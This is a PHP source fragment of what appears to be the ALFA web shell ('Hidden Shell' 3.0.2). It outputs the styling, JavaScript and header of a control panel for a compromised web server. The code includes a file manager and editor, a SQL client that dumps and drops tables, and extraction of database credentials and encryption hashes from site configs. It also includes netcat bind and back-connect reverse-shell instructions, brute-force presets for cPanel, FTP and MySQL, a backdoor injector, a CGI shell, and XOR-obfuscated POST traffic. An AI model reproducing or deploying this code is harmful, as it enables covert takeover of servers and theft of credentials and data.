#0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #0E304A;background:transparent;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
.foottable{width: 300px;font-weight: bold;' . (!@is_writable($GLOBALS['cwd']) ? '}.dir{background-color:red;}' : '}') . '
.main th{text-align:left;}
.main a{color: #FFF;}
.main tr:hover{background-color:#646464;}
.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:99%; height:300px; }
' . alfaCssLoadColors() . '
</style>';
        echo "<script type='text/javascript'>\nvar c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\nvar a_ = '" . htmlspecialchars(@$_POST['a']) . "'\nvar charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\nvar alfa1_ = '" . (strpos(@$_POST['alfa1'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa1'], ENT_QUOTES)) . "';\nvar alfa2_ = '" . (strpos(@$_POST['alfa2'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa2'], ENT_QUOTES)) . "';\nvar alfa3_ = '" . (strpos(@$_POST['alfa3'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa3'], ENT_QUOTES)) . "';\nvar alfa4_ = '" . (strpos(@$_POST['alfa4'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa4'], ENT_QUOTES)) . "';\nvar alfa5_ = '" . (strpos(@$_POST['alfa5'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa5'], ENT_QUOTES)) . "';\nvar alfa6_ = '" . (strpos(@$_POST['alfa6'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa6'], ENT_QUOTES)) . "';\nvar alfa7_ = '" . (strpos(@$_POST['alfa7'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa7'], ENT_QUOTES)) . "';\nvar alfa8_ = '" . (strpos(@$_POST['alfa8'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa8'], ENT_QUOTES)) . "';\nvar alfa9_ = '" . (strpos(@$_POST['alfa9'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa9'], ENT_QUOTES)) . "';\nvar alfa10_ = '" . (strpos(@$_POST['alfa10'], "\n") !== false ? '' : htmlspecialchars($_POST['alfa10'], ENT_QUOTES)) . "';\nvar d = document;\nvar mysql_cache = {};\nvar editor_files = {};\nvar editor_error = true;\nvar editor_current_file = '';\nvar is_minimized = false;\nvar cgi_is_minimized = false;\nvar cgi_lang = '';\nvar upcount = 1;\nvar islinux = " . ($GLOBALS['sys'] != "win" ? 'true' : 'false') . ";\nvar post_encryption_mode = " . "true" . ";\nfunction set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {\nif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\nif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
        for ($j = 1; $j <= 10; $j++) {
            echo 'if(alfa' . $j . '!=null)d.mf.alfa' . $j . '.value=alfa' . $j . ';else d.mf.alfa' . $j . '.value=alfa' . $j . '_;';
        }
        echo "\nif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n}";
        echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\\"header_pwd\\" onclick=\\"g(\'FilesMan\',\'/\');\\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\\"g(\'FilesMan\',\'"+g+e[i]+"/\');\\" href=\'javascript:void(0);\' class=\\"header_pwd\\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="' . __showicon('loader') . '"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
function saveByKey(event){
	if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
	$("editor_edit_area").onsubmit();
	event.preventDefault();
	return false;
}
function setCookie(cname, cvalue, exdays){
    var d = new Date();
    d.setTime(d.getTime() + (exdays*24*60*60*1000));
    var expires = "expires="+ d.toUTCString();
    document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
}
function getCookie(name){
  var value = "; " + document.cookie;
  var parts = value.split("; " + name + "=");
  if (parts.length == 2) return parts.pop().split(";").shift();
}
function editorClose(pos){
	d.body.style.overflow = "visible";
	elem = $(pos);
	elem.setAttribute("class", "editor-anim-close");
	if(pos == "editor"){
		is_minimized = false;
	}else{
		cgi_is_minimized = false;
	}
	setTimeout(function(){
		elem.removeAttribute("class");
		elem.style.display = "none";
	}, 1000);
	d.body.style.overflow = "visible";
}
function showEditor(pos){
	$(pos).setAttribute("class", "editor-anim-show");
	$(pos+"-minimized").setAttribute("class", "minimized-hide");
	if(pos == "editor"){
		is_minimized = false;
		if(cgi_is_minimized){
			$("cgiloader-minimized").style.top = "30%";
		}
	}else{
		cgi_is_minimized = false;
		if(is_minimized){
			$("editor-minimized").style.top = "30%";
		}
	}
	d.body.style.overflow = "hidden";
}
function editorMinimize(pos){
	$(pos).setAttribute("class", "editor-anim-minimize");
	$(pos+"-minimized").setAttribute("class", "minimized-show");
	if(pos == "editor"){
		is_minimized = true;
		if(cgi_is_minimized){
			$("cgiloader-minimized").style.top = "20%";
			$("editor-minimized").style.top = "50%";
		}else{
			$("editor-minimized").style.top = "30%";
		}
	}else{
		cgi_is_minimized = true;
		if(is_minimized){
			$("cgiloader-minimized").style.top = "20%";
			$("editor-minimized").style.top = "50%";
		}else{
			$("cgiloader-minimized").style.top = "30%";
		}
	}
	d.body.style.overflow = "visible";
}
function clearEditorHistory(){
	var check = confirm("Are u Sure?");
	if(check){
		for(var i in editor_files){
			if(i != editor_current_file){
				removeHistory(i);
			}
		}
	}
}
function editor(file, mode, arg, pwd, file_id, type){
	if(type=="dir"&&file=="..")return false;
	if(mode == "download"){
		g("FilesTools",pwd,file,"download");
		return false;
	}
	var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
	file = file.trim();
	if(Object.keys(editor_files).length == 0){
		var cookie_file = getCookie("alfa_history_files");
		try{
			editor_files = JSON.parse(cookie_file);
			for(var t in editor_files){
				insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
			}
		}catch(e){}
	}
	if(file.indexOf("/") != -1){
		var file_split = file.split("/");
		file = file_split[file_split.length - 1];
		delete file_split[file_split.length - 1];
		cwd = file_split.join("/");
		if(islinux){
			cwd = "/"+cwd;
		}
	}
	if(typeof type == "undefined"){
		type = "";
	}
	if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
		cwd = pwd.trim();
	}
	try{
		for(var i in editor_files){
			if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\\//g,"") == cwd.replace(/\\//g,"")){
				can_append = false;
				file_id = i;
				break;
			}
		}
	}catch(e){
		console.log(e);
	}
	editor_error = true;
	if(typeof arg != "undefined" && arg.length != 0 && arg != null){
		param = alfab64(arg);
	}
	if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
		fid = alfab64(file_id);
		pure_fid = file_id;
	}else{
		var rand_fid = "file_" + getRandom(10);
		fid = alfab64(rand_fid);
		pure_fid = rand_fid;
	}
	alfaloader("block");
	_Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
		document.querySelector(".editor-content").innerHTML = e;
		$("editor").style.display  = "block";
		alfaloader("none");
		evalJS(e);
		if(mode != "delete" && editor_error){
			var active = d.getElementsByClassName("is_active");
			if(active.length != 0){
				active[0].className = "file-holder";
			}
			fid = pure_fid;
			file = decodeURIComponent(file);

			if(!editor_files[fid] && can_append){
				editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
				insertToHistory(fid, file, " is_active", type);
				if(mode=="mkfile"){
					g("FilesMan",null);
				}
			}else{
				$(fid).parentNode.className += " is_active";
			}
		}
		d.body.style.overflow = "hidden";
		d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
		if(editor_files[fid]){
			d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\\/\\//g, "/");
		}
		editor_current_file = fid;
		if(is_minimized){
			showEditor("editor");
		}
		updateCookieEditor();
	});
	return false;
}
function insertToHistory(fid, file, mode, type){
	var active = "";
	if(mode && mode != 0){
		active = mode;
	}
	var NewElement = document.createElement("div");
	NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\\""+fid+"\\");\'>X</div>";
	NewElement.className = "file-holder" + active;
	NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
	NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
	var refNode = d.getElementsByClassName("history-list")[0];
	refNode.insertBefore(NewElement, refNode.firstChild);
}
function loadType(file,type,id){
	if(type == "none"){
		_Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
			$(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
			editor_files[id].type = e;
		});
	}
	var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
	if(type == "file"){
		type = file.split(".");
		type  = type[type.length - 1].toLowerCase();
		var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
		if(types.indexOf(type) == -1){
			type = "notfound";
		}
	}else{
		type = "folder";
	}
	return img.replace("{type}",  type + ".png");
}
function updateDirsEditor(fid, fname){
	var current_path = d.mf.c.value + "/";
	var oldpath  = editor_files[fid].pwd + "/" + fname + "/";
	var newpath  = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
	oldpath = oldpath.replace(/\\/\\//g, "/");
	newpath = newpath.replace(/\\/\\//g, "/");
	current_path = current_path.replace(/\\/\\//g, "/");
	if(current_path.search(oldpath) != -1){
		initDir(current_path.replace(oldpath, newpath));
		d.mf.c.value = current_path.replace(oldpath, newpath);
		_Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
	}
	for(var i in editor_files){
		var path = editor_files[i].pwd + "/";
		path = path.replace(/\\/\\//g, "/");
		if(path.search(oldpath) != -1){
			editor_files[i].pwd = path.replace(oldpath, newpath);
		}
	}
	var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
	var reg2 = new RegExp(fname + " \\\\|</b></a>");
	d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
	d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
	updateCookieEditor();
}
function updateCookieEditor(){
	setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
}
function setEditorTitle(fid, mode){
	if(mode == "out" && editor_current_file != ""){
		fid = editor_current_file;
	}
	if(editor_files[fid]){
		d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\\/\\//g, "/");
	}
}
function removeHistory(el){
	delete editor_files[el];
	if($(el)){
		$(el).parentNode.parentNode.removeChild($(el).parentNode);
	}
	var elm = d.getElementsByClassName("filestools")[0];
	if(elm){
		if(elm.getAttribute("fid") == el){
			elm.outerHTML = "";
		}
	}
	if(editor_current_file == el){
		editor_current_file = "";
	}
	updateCookieEditor();
}
function getRandom(e){
	for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
	return t
}
function reopen(el){
	var file_id = el.getAttribute("id")
	var pwd = editor_files[file_id].pwd;
	var filename = editor_files[file_id].file;
	editor(filename, "auto", "", pwd, file_id);
}
function copyToClipboard(el){
	var node = document.getElementById(el);
	if(document.selection){
		var range = document.body.createTextRange();
		range.moveToElementText(document.getElementById(el));
		range.select();
		document.execCommand("Copy");
		alert("text copied");
	}else if (window.getSelection()){
		var range = document.createRange();
		range.selectNode(document.getElementById(el));
		window.getSelection().removeAllRanges();
		window.getSelection().addRange(range);
		document.execCommand("copy");
		alert("text copied");
	}
}
function encrypt(str, pwd) {
	if (pwd == null || pwd.length <= 0) {
		return null;
	}
	str = alfab64(str, true);
	pwd = alfab64(pwd, true);
	var enc_chr = "";
	var enc_str = "";
	var i = 0;
	while (i < str.length) {
		for (var j = 0; j < pwd.length; j++) {
			enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
			enc_str += String.fromCharCode(enc_chr);
			i++;
			if (i >= str.length) break;
		}
	}
	return alfab64(enc_str, true);
}
function reloadSetting(e){
alfaloader("block");
_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
return false
}
function reloadColors(config){
	var obj = {};
	if(typeof config == "undefined"){
		d.querySelectorAll(".colors_input").forEach(function(e){
			var id = e.getAttribute("target").replace(".", "");
			obj[id] = e.value;
		});
	}else{
		obj = config;
	}
	alfaloader("block");
	var checdk = ($("use_default_color").checked?"1":"0");
	_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
}
function alfab64(a, normal){
	if(typeof normal != "undefined" || post_encryption_mode == false){
		return window.btoa(unescape(encodeURIComponent(a)));
	}
	return encrypt(a, "' . _AlfaSecretKey() . '");
}
function evalCss(jcss){
	var style = document.createElement("style");
	if (style.styleSheet) {
		style.styleSheet.cssText = jcss;
	} else {
		style.appendChild(document.createTextNode(jcss));
	}
	d.getElementsByTagName("head")[0].appendChild(style);
}
function colorHandlerKey(el){
	setTimeout(function(e){
		colorHandler(el);
	}, 200);
}
function colorHandler(el){
	var target = el.getAttribute("target");
	var multi = el.getAttribute("multi");
	var ishover = target.indexOf(":hover");
	if(multi){
		var array = JSON.parse(atob(multi));
		var jcss = "";
		for(i in array.multi_selector){
			jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
		}
		evalCss(jcss);
	}
	if(ishover != -1 && !multi){
		$("input_" + target.replace(".","")).value = el.value;
		$("gui_" + target.replace(".","")).value = el.value;
		var css = target+"{color: "+el.value+";}";
		evalCss(css);
	}else{
		$("input_" + target.replace(".","")).value = el.value;
		$("gui_" + target.replace(".","")).value = el.value;
		if(target == ".header_values"){
			target = ".header,.header_values";
		}
		d.querySelectorAll(target).forEach(function(e){
			e.style.color = el.value;
		});
	}
}
function importConfig(event){
	var input = event.target;
    var reader = new FileReader();
    reader.onload = function(){
      var data = reader.result;
	  try{
		  var conf = JSON.parse(data);
		  reloadColors(conf);
	  }catch(e){
		  alert("Config is invalid...!");
	  }
	  $("importFileBtn").value = "";
    };
    reader.readAsText(input.files[0]);
}
function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
function path_history(pos){
	_Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
}
function runcgi(lang){
	if(cgi_is_minimized && cgi_lang == lang){
		showEditor("cgiloader");
		return false;
	}
	_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
		d.body.style.overflow = "hidden";
		$("cgiloader").style.display = "block";
		$("cgiframe").innerHTML = e;
		cgi_lang = lang;
		if(cgi_is_minimized){
			$("cgiloader-minimized").setAttribute("class", "minimized-hide");
			setTimeout(function(){
				$("cgiloader").removeAttribute("class");
				if(is_minimized){
					$("editor-minimized").style.top = "30%";
				}
			}, 1000);
		}
	});
}
';
        echo "</script>\n<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>\n<input type='hidden' name='a' value='dlfile'>\n<input type='hidden' name='c' value=''>\n<input type='hidden' name='file' value=''>\n</form>\n<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>\n<img id='a_loader' src='" . __showicon('loader') . "'>";
        $cmd_uname = alfaEx("uname -a", false, false);
        $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');
        if ($uname == "( php_uname ) Function Disabled !") {
            $GLOBALS["need_to_update_header"] = "true";
        }
        echo '
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div id="up_bar"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c" value="' . $GLOBALS['cwd'] . '">';
        for ($s = 1; $s <= 10; $s++) {
            echo '<input type="hidden" name="alfa' . $s . '">';
        }
        echo "<input type=\"hidden\" name=\"charset\">\n</form>\n<div id='hidden_sh'><a class=\"alert_green\" target=\"_blank\" href=\"?solevisible\">Hidden Shell<br><small>Version: <span class=\"hidden_shell_version\">3.0.2</span></small></a></div>\n<div class=\"header\"><table width=\"100%\" border=\"0\">\n<tr>\n<td width=\"3%\"><span class=\"header_vars\">Uname:</span></td>\n<td colspan=\"2\"><span class=\"header_values\" id=\"header_uname\">" . $uname . '</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">' . $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
</tr>
<tr>
<td><span class="header_vars">PHP:</span></td>
<td><b>' . @phpversion() . ' </b><span class="header_vars"> Safe Mode: ' . $safe_modes . '</span></td>
</tr>
<tr>
<td><span class="header_vars">ServerIP:</span></td>
<td><b>' . (!@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????' : @$_SERVER["SERVER_ADDR"]) . ' <span class="header_vars">Your IP:</span><b> ' . @$_SERVER["REMOTE_ADDR"] . '</b></td>
</tr>
<tr>
